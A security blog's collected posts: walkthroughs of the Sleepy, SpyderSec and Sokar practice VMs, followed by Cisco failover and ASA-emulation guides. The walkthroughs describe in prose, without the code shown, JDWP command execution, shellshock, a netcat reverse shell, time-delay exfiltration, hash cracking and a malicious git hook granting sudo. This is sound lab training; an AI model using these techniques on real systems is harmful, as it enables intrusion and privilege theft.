/dev/random: Sleepy

Looks like I’ve got time to write up another recent VM challenge before the memory fades. This time, it’s boot2root challenge Sleepy by Sagi-.

I really like this one because it took me back to my University days of Java development. Then I hated it because it took me back to doing acrobatics with I/O readers, buffers, streams, etc. the Java way. Then when I completed it I loved it.

On with it then!

Initial scanning

Starting off with a full TCP SYN scan produce three open ports.

TCP 21 is FTP, and it allows anonymous login:

Anonymous is rightly jailed and there’s only an image to download:

sleepy

I thought that the image might hold some essential information or clues, but I wasn’t able to find any. Not sure if it’s a motif or a red herring.

Assuming FTP’s a red herring, attention turns to the other two open ports. Running a service scan on the ports might confirm what protocols they’re offering:

So with ajp13 confirmed as Apache Jserv, I guess we’re looking at something Tomcat. Probably my first thing to start work on.

At this stage I had never heard about Java Debug Wire Protocol, but a quick search tells me it’s a remote Java debugger.  This should be great. I still like working with Java, so if I get to play around with a debugger I’ve never seen that’s cool.

Dealing strictly with Apache Jserv first, however…

AJP

As AJP has accidentally been left open to the world, it might be possible to exploit the system, for example by injecting malicious code to the server. In order to control it, though, I need access to some Tomcat management interface to test it.

Exploiting an open AJP is pretty well documented by others so I’ll not go into to much commentary on it. I needed to set up Apache on my machine, and add the Apahce jk modules. Then configuring jk to forward requests – not to my local server, but to the victim – it should be possible to try and get management access.

libapache2-mod-jk provides the following files:

The default Apache website needs to forward all requests to JK, and JK needs to be configured to forward requests to the victim.

After restarting Apache, it’s possible to connect to http://localhost/ and see all of the Tomcat goodies including /manager/ and /host-manager/ on the victim. However, the passwords are not the defaults and attempting a few passwords didn’t prove successful.

Tomcat

Getting access is going to require viewing the administrative passwords – often stored in plaintext – from the server.

The Java debugger

The JDWP port appears to be controlled by the jdb command which provides a remote shell for control. It’s not a shell with the breadth of control that a terminal would provide – everything has to be done via Java execution – but hopefully with enough libraries exposed something can be conjured up.

The help is pretty good for jdb. Command classes outputs a list of all classes that are available to the running program, and classpath shows that we seem to be running Java 7…

Above we’ve got a hell of a lot of Java standard library classes available, plus a class which is named without a long package name – luciddream. This is presumably the author’s work, and given the Sleepy theme, that’s a fair guess.

It’s unfortunately not possible to just execute arbitrary Java from the prompt:

Instead control of execution needs to be seized by the debugger. The main class has only one function other than main and the constructor:

Setting a breakpoint on snore() and waiting eventually gives us control and at that point we can execute any arbitrary Java code we want, using the available classes:

Great! So, with all of the java.io classes we can potentially exfiltrate file data from the victim, or possibly even inject data. Also with java.lang.Runtime we’ve got access to the current thread and can execute arbitrary commands.

The thing is, merely executing a command will merely return the object representing the new process, not the response to the command. For example, running whoami:

To actually get output from the command, some I/O acrobatics is required. Working with what we’ve got (and I probably am not doing it in the most efficient manner), we’ve got the following return values and methods to link up.

  • exec() returns an object of type Process, let’s call it p.
  • p.getInputStream() returns an object of type InputStream, i
  • Ultimately we’re looking to get a String, s, which can be output to the console
  • Out of the many readers available, BufferedReader, r, offers method readLine() which returns a String, s
  • A BufferedReader, r, can be instantiated with an InputStreamReader, ir
  • An InputSteamReader, ir, can be instantiated with an InputStream, i, which we got earlier

Got that? Good.

  • exec() gives us Process p
  • p.getInputStream() gives us InputStream i
  • new InputStreamReader(i) gives us InputStreamReader ir
  • new BufferedReader(ir) gives us BufferedReader r
  • r.readLine() gives us String s

Putting this into practice, we can attempt to run whoami again:

Unfortunately things get a bit more complicated when the result of the command is multiple lines. We only get one call to readLine() on the BufferedReader, so only the first line of output can be retrieved. e.g. ls -la produces a weak result:

To get full output, line feeds need to be replaced with another string – e.g. by using awk ORS=’something’ – and in order to build more complicated commands with pipes and so on, we need a command processor, e.g. bash.

Voila:

Using this methos I did a search for files with tomcat in the name and got the following (edited) list:

Dumping this file gives us the passwords we require (again, edited for reading):

Credentials

TomcatManager

Exploiting Tomcat

Exploiting isn’t the right word here, as we own Tomcat now. We can easily get control as the Tomcat user with Metasploit and the credentials. (Remember that the rhost/target is our own machine as we’re attacking the victim through our Apache server:

We’ve not got a reasonable user shell on the system.

Privilege escalation

It’s getting quite late and I don’t want to make an already verbose walkthrough too much longer. In summary the following items were found in further investigation and are able to lead to privilege escalation.

First of all the machine is vulnerable to shellshock:

This may seem counter intuitive when we already have a shell, but it will come in essential later.

Furthermore there is an executable /usr/bin/nightmare that has SUID bit set and is owned by root. Since this runs as root, if we can get something arbitrary to run from this, then we can gain access as root.

I found the Meterpreter session to be extremely unstable for what happens next – I kept getting disconnected – so I uploaded nc to the victim and opened a reverse shell back to my machine:

And locally on my machine we can get a decent interactive shell:

nightmare needs some better terminal emulation configured, so this can be set up by setting environment variable TERM to ‘linux’ and using Python to spawn a proper tty. (FYI, to enter Ctrl-C in the terminal enter Ctrl-V first; this allows the Ctrl-C to be sent through to the remote host’s control instead of killing the Meterpreter session.)

Here’s what happens when /usr/bin/nightmare is executed normally:

Decompiling nightmare with Hopper, it’s easy to see what it’s doing. main() runs a loop (sub_4008d0()) which repeatedly calls fire(), which executes the command /usr/bin/aafire which is what’s responsible for animating the ASCII-art fire. The option to quit the program at the y/n prompt is ‘broken’ but by pressing Ctrl-C we enter sigHandler() which calls train(), which executes /usr/bin/sl – the executable responsible for the ASCII-art train. However, crucially this call sets the real/effective/saved UIDs and GIDs to root preventing a reduction in privileges if we can explioit Shellshock.

After finding a method to exploit that I hadn’t seen before, it was possible to get a root shell and get the flag.

Done!

SpyderSec: Challenge

I can’t believe it’s been nine months since my last post. I must have been busy. Or lazy.

Just as well I recently completed SpyderSec‘s nice little X-Files themed encryption challenge to get me out of my blog funk.

This was a really fun one, and totally worth a look if you’re interested in video steganography. This is a walkthrough to how I completed the challenge, so if you fancy trying yourself look away now.

Flag #1

The challenge spec already makes clear that this is a web application challenge and a full nmap TCP scan confirmed that only port 80 was open. The web page served doesn’t reveal too much:

Website front page

Just in case an administrator left some content or administration pages open, I scanned the host with dirb.

Search turns up a /v/ directory, but this is Forbidden.

Looking at the html source of the page reveals some packed JavaScript:

You can dump this packed program into one of a few public JavaScript unpackers, but I wanted to see if it would evaluate fine in nodejs, which it did:

The hex values appeared to be ASCII characters, so I tried converting to a string and got some interesting output:

I wasn’t sure what to make of “muder.fbi” at this point. Plugging it into the dirb search didn’t turn up any hidden content.

Plugging away at the page for a while, I turned to look at the logs of the requests I had made in BurpSuite. I noticed that the page was including a cookie and that it mentioned a URI:

I already knew of the /v/ directory, so it stood that there was a good chance I would find something interesting if I accessed this location directly. However, I found disappointment in the fact that the URI was also a forbidden location:

The challenge was beginning to feel very much like a hidden data exercise. I tried plugging various strings I had captured into the web server to see if I could find something. I can’t remember how long it took, but eventually putting the URI together with ‘mulder.fbi’ caused the web server to offer me a 13MB file:

A cursory examination of the file showed it as a video file.

Flag #2: Kill Switch

The video turned out to be a song with lyrics slides. (The song incidentally is a reference to an episode of The X-Files – I had to look that up.)

At this point I figured that there was something hidden in the video file. Hidden data – particularly where video is concerned – is really not my strong suit. I searched the file for strings (which didn’t help) and for container metadata (didn’t find any). On a hunch I decided to run the file through a video processor. I asked the program to make a direct stream copy of the audio and video, meaning that the whole content would be copied without recompression into a new file. If there was any hidden data in the file, it might reveal a difference in file size.

Several megabytes of data were missing from the stream copy, but the file played exactly the same; a strong indication that there was data to be found in the file. Since the data was not part of the video and audio streams, I felt I had a chance with this. (If the data had been hidden as data in the streams themselves then my chances of success would have been much lower.)

Still, I don’t really know much about video container formats, so I took the least resistance path and did some web searches first of all. Actually, doing a search for “hide data in mp4 video” turns up some pretty interesting stuff immediately. (That link is seriously worth a read if you’re interested.)

Working on the hunch that the video file contains a TrueCrypt encrypted volume, the challenge essentially becomes “find the correct password”. And the thing about TrueCrypt volumes is that they’re practically indiscernible from random data. All you can do is keep trying passwords until one works and even if you never find one that works, you will never know whether the data is actually random or you’ve just not found the correct password.

Anyway, you probably know where this is going. Eventually (too long) I found the password. I can’t remember exactly when I turned my attention to the website images (I had already gone over the BurpSuite logs several times to no avail, and was considering writing or searching for a tool to automate TrueCrypt password attempts) when I dumped the webpage content and started looking for strings.

The password was hidden in the metadata in the following file:

SpyderSec Challenge.png

And there we have it. The TrueCrypt password is A!Vu~jtH#729sLA;h4%. After that, getting to the final flag is a breeze…

SpyderSec TyueCrypt password

SpyderSec TrueCrypt volume mounted successfully

SpyderSec challenge completed

Sokar: VulnHub anniversary competition

VulnHub just turned two, and to celebrate, they held a three week competition. The subject is Rasta Mouse‘s challenging VM, Sokar, which features multiple interesting and very recent vulnerabilities.

The challenge took me quite a few hours; much longer than the three hours that someone reportedly finished under. However, I did some interesting things, so please read on if you are interested Python scripting, time-delay based exfiltration, file injection through unusual channels, memory forensics, password cracking, and how a client application (Git) can badly bite you in the butt.

Initial scanning

It’s usually pretty safe to get heavy handed with a new VM; no administrators are watching and it’s usually the quickest way to find the attack vectors…

OK, so we’ve got one lonely port, and this is what it’s showing…Selection_010

There’s nothing particularly exploitable looking about the page. It takes no user input, and it appears to be presenting pretty static information. When refreshing, the contents (a list of connections output from netstat) do not update automatically; instead they are updated periodically, probably by some cron job on the server.

The page contains an iframe which executes /cgi-bin/cat on the server but, as the name suggests, this is probably just outputting a specific file on the server that we have no control over.

My first thought at this stage was, if this is exploitable, and it takes no user input, and it’s a CGI, then it’s probably a Shellshock vulnerability (Bashbug’s a far better name though).

I sent a test the server’s way to see if I could get execution.

Well, that’s a bit of a bummer. Am I getting commands to be executed or not? I need a time based test:

A delay;  great! I’m definitely executing commands on the server (note that the absolute path needs to be used), but I can’t figure out how to get data returned.

This is where I might have previously given up, but after writing an ICMP exfiltration script for Persistence last year, I decided to write a program to exfiltrate data from the server using time delays.

The conspicuous machine gun timing script

Later on I found out that I didn’t really need to do all of this, so this might make me look a bit stupid, but I definitely think I get some points for style here.

Here’s the script – exfil.py – which will exfiltrate the response of an arbitrary command on Sokar using repeated queries and delays to slowly drip out the data at about 10 bits per second. =) (Note that you may need to tweak the parameter exfil_delay to suit your network latency and VM performance. Higher is more accurate and reliable, but obviously slower.)

And here’s the output:

Not very fast and also contains some errors. 2 minutes to get a short directory listing. Pretty fun though. Of course, a network with an IPS or an observant administrator would probably shutdown the server before I could get any further.

So I went on my merry way, getting directory listings at a very slow rate as the apache web server process, until I found my next clue.

(It’s worth also stating here that this exfiltration script will only for for information that remains static. Getting a directory listing of a directory that was rapidly changing, or a file that was changing, would require script modifications.)

The scarequote to end all wars

There are two users on the server: bynarr and apophis. The former’s home directory is open to other users…

lime is script that I have execute access to. I decided to run this to see what it is, and I was surprised to find that without my exfiltration script it will output data over Bashbug:

I exfiltrated the contents of the script to find out what was special about it. Turns out that it echoes a single double-quote at the start.

Is this a quirk of Bashbug that everyone knows except me? Perhaps; this is the first time I’ve exploited it. Anyway, it means I can throw away the script and just use curl again which is far quicker; all I need to do is output a double-quote before all commands I need output from.

The unbearable lightness of Bynarr

I proceeded with further information gathering at faster speed, until I found that bynarr‘s email is readable and provides some clues…

This is actually really great news, as I had already been attempting to gain a reverse shell from the server under the apache user, but all network communications appear to be blocked. This is evidence that a network connection can be made by bynarr over TCP port 51242. Though, did they mean source or destination port? (Answer to come later.)

Uploading arbitrary files

Before trying to mess around with reverse TCP connections, I decided to make a script that would allow me to inject files onto the server. Here’s inject.py for your pleasure:

This script will take any file as an argument and place it in the /tmp/ directory of Sokar, using multiple 50-Base64-byte chunks.

Getting an interactive shell

Things we need:

  • A reverse shell:
  • The ability to run commands as bynarr. For this we will use pexpect, which we will inject onto the server
  • A script to interact with pexpect, allowing us to su to bynarr and execute the reverse shell:

(By the way, this answers the earlier question about whether TCP 51242 is the source or destination port. I discovered through trial and error that from Sokar’s perspective TCP 51242 must be the destination. I think, therefore, root was being a bit disingenuous when using the word ephemeral which would usually imply what the source port should be. =))

All three of the above files are uploaded to the server and run (once we make sure that we have a waiting socket on the attacking machine to accept connections!).

Ta da! Got a connection. (I check the id and improve the shell I’ve given quickly:

The Limey

With the interactive shell, we revisit the lime script in /home/bynarr. The script allows the loading or unloading of a kernel module called lime.so:

Execution of insmod is usually restricted to root, but we can suspect that if it’s been placed there by root then bynarr’s been given sudo rights to run it.

Doing some research on LiME reveals that it’s a forensics kernel module that allows extraction of the entire contents of system memory. Fantastic. This creates a 256MB file at /tmp/ram which I need to get off the server for offline analysis.

We’re already using the only IPv4 port that can allegedly be used for connections, and 256MB is too much to dump to the terminal in Base64 encoding. I could kill my connection and upgrade to a Meterpreter shell, but I’d rather keep my tool use to a minimum.

The choice of a new generation

I noticed earlier that Sokar has IPv6 enabled:

What are the chances that the administrator didn’t take the same precautions about IPv6 connections that were taken for IPv4? I ping my attacking machine from the victim:

Looks promising. I’ll just upload ftp (it’s not on the server):

And then upload the file for analysis from Sokar:

Memory hunting

There’s a lot of information to trawl through in the RAM dump (have a look if you don’t believe me).

Having already wandered around the server quite a bit by this point – and having found that everything felt quite secure (i.e. no services to exploit, no misconfigurations, no vulnerable kernel) – I was convinced that it was actually just password hashes that were needed and that the next target was either the apophis user or root directly.

Opening up ram in hexedit and performing some searches (e.g. ‘shadow’, ‘passwd’, ‘password’) provided many many results, but a search for ‘apophis’ yielded the fastest return with a copy of the /etc/shadow file:

Selection_011

I added the hashes to a file and ran john against them using the RockYou password list. After not very long, I got the password for apophis:

BOOM! Let’s have a look what’s in apophis’s home:

Ok, we’ve got an ELF executable, which is run as root, and which appears to be trying to access another server called sokar-dev.

What’s he building in there?

Taking a copy of build off the server to disassemble reveals that the main purpose of the executable is encrypted. However, by debugging the program, we can discover quite easily what it’s doing:

This tells us that the script gets root to execute:

It’s not immediately clear how this could help, as cloning a repository is a safe routine. If it wasn’t, then there would be hundreds of nefarious projects tricking people into executing exploitative code, right?

But I had a niggling doubt, so I decided to check the CVE database for git vulnerabilities, bearing in mind that Sokar has git version 2.2.0.

Well it turns out that Git 2.2.0 has a vulnerability. The CVE appears to be undetailed as of writing, but it’s been publicised elsewhere since 18th December.

You git

Essentially, if a user checks out a nefarious repository with Git version 2.2.0 it is possible for an attacker to get arbitrary command execution. This only affects case insensitive file systems, so Linux should really be safe. However, the location where we’re going to be checking out to – /mnt/secret-project/ – is on a vfat volume, which is case insensitive:

The end is in sight. First we need to get Sokar to recognise our attacking machine as sokar-dev. As luck would have it, /etc/resolv.conf is world writeable!

We add a DNS zone file to BIND on the attacking machine, and of course we get sokar-dev to resolve to us. I’ll provide both IPv4 and IPv6 addresses just in case the administrator opened the IPv4 firewall just for this purpose. (Although, I’m pretty sure that IPv6 wouldn’t work anyway as the addresses we have are only local-link addresses and the interface/scopeId would need to be specified in the git command.)

An evil repository

The git clone command is vulnerable because we are able to take control of the user’s git configuration. The simplest way to abuse that is to create a post-checkout hook that the user never made that will execute an arbitrary command.

The command we will run is:

i.e. add full sudo privileges for user apophis.

To do so, we create an evil repository with a post-checkout hook in the .GIT/HOOKS directory.

To show the creation of a bad repository, I’ve made a quick video. The working location is root‘s home directory on the attacking machine; that is the location that the victim’s root user is going to connect to to retrieve the repository.

Privilege elevation

All that leaves is to clone the the repository, which will in turn checkout the HEAD revision, write a hook to .git/hooks/post-checkout, and execute it…

Iptables

Just for completeness, here’s the iptables configuration that prevented all connections except bynarr‘s outgoing connections to destination TCP port 51242, root‘s outbound SSH connections to sokar-dev, and the server’s outbound DNS queries.

Conclusion

This was a great challenge.  There were lots of steps covering many unrelated areas and it didn’t feel contrived. After my last big challenge which mainly concentrated on binary exploitation, it was nice to attack a machine that was mainly vulnerable through tools and configuration. It’s close in spirit to the machines in the Offensive Security‘s PWK course.

It would have been nice if there had been an additional step required to modify /etc/resolv.conf; that was the only bit that felt a little unlikely. However, despite that it still proved to be very time consuming and frustrating (in a good way) and I highly recommend others to try it even now that the competition has closed.

Thanks again to Rasta Mouse and g0tmi1k from VulnHub for the great work on this. Please feel free to leave any comments or questions.

High availability Internet connectivity on a budget

This post was originally written back in 2012 in my previous job. I’ve reposted it here in case it’s of any use in the future.

How can you improve Internet connectivity for an office on a budget?

This was a problem we had recently for a customer of ours. The customer did not have a budget for a highly available Internet connection from an ISP. Their existing service was a standard business/consumer cable connection that performed all of their needs most of the time and was about all they felt they needed to pay. However, they needed to insure against the occasional outage that is not uncommon for such a service (one or two hours a month, say). Spending thousands of pounds was not an option on the table.

The service did indeed fail every few weeks, but the provider had been unable to improve reliability and so the problem remained one of: tolerate the problem or look for an alternative more reliable provider.

However, the customer already had a Cisco 1811 ISR router (circa £600) which would be able to provide route failover if only there was a second Internet connection.

The solution we offered and implemented was to install a second low cost Internet connection from another supplier, and to implement IP SLAs to handle failover. The existing router had all of the features required using only static routes and without any routing protocols.

Two ISPs connected to one router
The planned configuration

The following post is very Cisco oriented, but similar features may be available with alternative vendors’ equipment.

Basic configuration

The cable connection was the fastest, and so that would be the active connection. The DSL connection would be redundant and only come into use when failure of the cable connection occurred.

The DSL connection was tested and then connected to a free Layer 3 port on the router. It was was added to the routing table thus:

The lower metric for FastEthernet0 means that all traffic will be routed out that unless the interface is administratively down. However, if the interface is up and the ISP has a failure upstream, then the connection will not automatically failover. More on that later.

Address translation and route maps

Outgoing connections need to be translated to the correct public IP address depending on what route is taken. (This is in contrast to higher availability solutions where the IP addresses might be rerouted.) The existing NAT rules were simply duplicated for the new connection. Here, using route maps, the connection is translated to the correct IP address depending on which interface the connection leaves:

At this stage, the failover can be tested by manually shutting down FastEthernet0. (It may also be necessary to clear the NAT translation table.) All being correct, Internet connection should remain available.

IP SLAs

The final step to providing failover is remarkably simple.

First a suitable upstream IP address needs to be found for each connection to monitor for availability. Your ISPs have probably provided equipment that serve as the next hop. However, monitoring those is not suitable for they will remain available when the connection has failed further upsteam.

Perform a trace route for each connection to determine a suitable test candidate. Here, upstream routers have been identified that can be monitored for availability.

Traceroute can be used for each connection to identify the upstream routers on the service provider network.
Service provider routers identified for monitoring *

Now, SLA rules can be defined to monitor the two connections.

Above, two seperate SLAs have been configured. Each independently pings the upstream routers every 5 seconds, and notes a problem if there is not a response within 1 second (or 1000ms). However, we want to avoid invoking a failover if the disruption is short, so the connection must be down for 15 seconds before a failure will occur. We also want to avoid flapping of the connection (if the connection is regularly going down every minute it will cause frustration to bring it back every time), so a failed state will only end after 120 seconds without timeout.

You can now check the current status with the ‘show track’ command. The command should show ‘Reachability is Up’ for each connection. To put the rules into effect, the routing table must be modified to use the rules. In the following, the routes have been altered to reference the track objects, and so a failure will cause the route entry to be disabled.

One more thing…

Once a failover does occur, the route is effectively gone from the routing table. That applies equally for traffic originating from the router as it does for traffic going across it. That includes the monitoring traffic. To allow the router to detect the resolution of a service outage after a failover, explicit routes need to be added to the routing table for each monitored router:

You now have a simple failover between two basic Internet connections using standard features available in most Cisco IOS routers, while avoiding the use of routing protocols and expensive availabilty solutions from service providers.

Results

So far, in the last two months the primary connection (which is the fastest and preferred, but unfortunately the less reliable) has been down on three occasions for an average of 3 hours each time. Already the improvements have paid off.

In future articles I will elaborate on expanding the configuration to include load-balancing traffic to make better use of the redundant connection, and how incoming traffic for services such as web and email can continue to be served during a service provider failure.

* There are caveats with this post’s selection of router to monitor. If the ISP has a failure somewhere further upstream then your monitoring will fail to notice it. Alternatively, if the ISP reorganises the network and the router you were monitoring is removed, the monitoring will incorrectly believe the connection is down. These problems must be considered on a per connection basis and may need to be solved with the assistance of the particular service providers involved.

Emulating a Cisco ASA in GNS3

I originally wrote a post with this title for my last employer’s website 2 years ago. It was pretty popular for some reason (perhaps because information about ASA emulation was a lot less common than it is now), so I decided to revisit it and update it if required.

Back at the time, I was working on an upgrade of a pair of critical Cisco ASA firewalls from version 8.2 to a version greater than 8.3; this is a major upgrade that changes the commands for NAT significantly.

Cisco have incorporated a migration script into the upgrade process that attempts to convert the old 8.2 commands to 8.3 syntax. However, it’s not perfect and some configurations will just not migrate without intervention.

Having initially attempted the upgrade on the standby ASA, the automatically generated configuration produced by the upgrade was found to be producing undesirable behaviour. The ASA was rolled back but not before taking a copy of the configuration. Being unable to purchase another ASA for lab testing, the bad configuration was loaded into an emulated ASA in GNS3 and through trial and error new quirks in ASA configuration were corrected and the problem solved in the live environment.

Preparation

An excellent script by dmz at 7200emu.hacki.at (repack.v4.sh.gz) is necessary. This will take an ASA image and separate it into two files – a RAM disk and a kernel image. (Register and login to be able to download it.)

You will also need the Cisco ASA 8.4(2) image (asa842-k8.bin), as that is the image that the repack script is designed for. I did not attempt to use or remodel the repack script for other ASA versions, so that’s an interesting challenge for another day.

On a Linux system (I’m using Linux Mint 17, which should be very similar in behaviour to Ubuntu 14.04), run the script against the image. (Script needs run as root to avoid errors from cpio, so run at own risk.)

Keep two of the files produced:

  • asa842-vmlinuz
  • asa842-initrd.gz

Since Linux is what I work in these days, I’m mainly interested in getting GNS3 working in that, but I was unable to get it to work without a programming assertion failure. Since I had no such problems in Windows, and I will probably rarely or never need to emulate an ASA again, that will suffice.

Windows guide

GNS3 has had had quite a few updates since 0.8.3. Now in version 1.1, the installer now includes WinPcap and Wireshark by default. I’ll assume that the GNS3-1.1-all-in-one.exe installer has been installed with the default packages at minimum.

Once installed, open GNS3 and in Edit > Preferences > QEMU > QEMU VMs, create a New VM.

Name the VM whatever you want, but set the Type to ‘ASA 8.4(2)’. The default Qemu binary of qemu-system-x86_64w.exe is fine, as is the 1024MB of RAM. Choose the initrd and vmlinuz binary files created earlier, and then save the VM preferences.

The completed VM should look something like this:

GNS3 1.1 QEMU VM Configuration

Now, having created the VM definition, simply drag an ASA device into a topology; you should now be able to start it, connect to the console, and make connections just like any IOS device…

ASA successfully booted in GNS3 on Windows

Linux guide

As already mentioned above, I was unsuccessful getting a working solution in Linux, but I will put one here if I ever get one.

(It’s possible that I was making problems for myself by not to downloading the latest versions of GNS3 and Qemu. I prefer to use the distro packages wherever possible.)

 

wopr decompiled

This post is a follow up to my Persistence post, and only of interest to people that really want to compare my decompiled C with the disassembled wopr binary.

Here follows the disassembled wopr executable, with my decompiling comments interspersed.

I glossed over error handling; wopr’s handling of failures (such as failure to open sockets) is completely ignored; only a best case-scenario is examined.